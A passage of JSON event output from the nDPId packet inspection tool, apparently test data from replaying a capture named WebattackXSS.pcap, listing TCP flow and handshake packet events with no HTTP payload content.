-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347233219,"flow_last_seen":1499347233219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347233219,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1499347233219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347233219,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Fw9AAD4GrsGsEAABwKgKMtbiAFBsKfwzAAAAAKACchAy\/gAAAgQFtAQCCAoBOes8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2215,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1499347233219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347233219,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1uJkUL6IbCn8NKAScSBQbgAAAgQFtAQCCAoD47yyATnrPAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1499347233220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347233220,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FxBAAD4GrsisEAABwKgKMtbiAFBsKfw0ZFC+iYAQAOXvdQAAAQEICgE56zwD47yy"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347234469,"flow_last_seen":1499347234469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347234469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1499347234469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347234469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vaZAAD4GCCqsEAABwKgKMtbwAFD38VHSAAAAAKACchBQUQAAAgQFtAQCCAoBOex0AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1499347234469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347234469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1vAPBPjT9\/FR06AScSCHigAAAgQFtAQCCAoD473qATnsdAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1499347234470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347234470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vadAAD4GCDGsEAABwKgKMtbwAFD38VHTDwT41IAQAOUmkgAAAQEICgE57HQD473q"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347235716,"flow_last_seen":1499347235716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347235716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1499347235716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347235716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wLxAAD4GBRSsEAABwKgKMtb+AFAtaC0QAAAAAKACchA+VwAAAgQFtAQCCAoBOe2sAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1499347235716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347235716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1v760xqZLWgtEaAScSBmwwAAAgQFtAQCCAoD478iATntrAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1499347235717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347235717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wL1AAD4GBRusEAABwKgKMtb+AFAtaC0R+tMamoAQAOUFywAAAQEICgE57awD478i"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347238260,"flow_last_seen":1499347238260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347238260,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1499347238260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347238260,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8N5lAAD4GjjesEAABwKgKMtcYAFCMG8exAAAAAKACchBCbAAAAgQFtAQCCAoBOfAoAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1499347238260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347238260,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1xiQuLeAjBvHsqAScSA1kAAAAgQFtAQCCAoD48GeATnwKAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2255,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1499347238261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347238261,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0N5pAAD4Gjj6sEAABwKgKMtcYAFCMG8eykLi3gYAQAOXUlwAAAQEICgE58CgD48Ge"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347239517,"flow_last_seen":1499347239517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347239517,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1499347239517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347239517,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d9VAAD4GTfusEAABwKgKMtcmAFDWiYa3AAAAAKACchA3sAAAAgQFtAQCCAoBOfFiAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1499347239517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347239517,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1yYFUEfr1omGuKAScSAkmAAAAgQFtAQCCAoD48LYATnxYgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1499347239518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347239518,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d9ZAAD4GTgKsEAABwKgKMtcmAFDWiYa4BVBH7IAQAOXDnwAAAQEICgE58WID48LY"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347240786,"flow_last_seen":1499347240786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347240786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1499347240786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347240786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LjpAAD4Gl5asEAABwKgKMtc0AFB5mNylAAAAAKACchA9aAAAAgQFtAQCCAoBOfKfAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1499347240786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347240786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1zRt9KwCeZjcpqAScSBcVgAAAgQFtAQCCAoD48QWATnynwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1499347240787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347240787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LjtAAD4Gl52sEAABwKgKMtc0AFB5mNymbfSsA4AQAOX7XAAAAQEICgE58qAD48QW"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
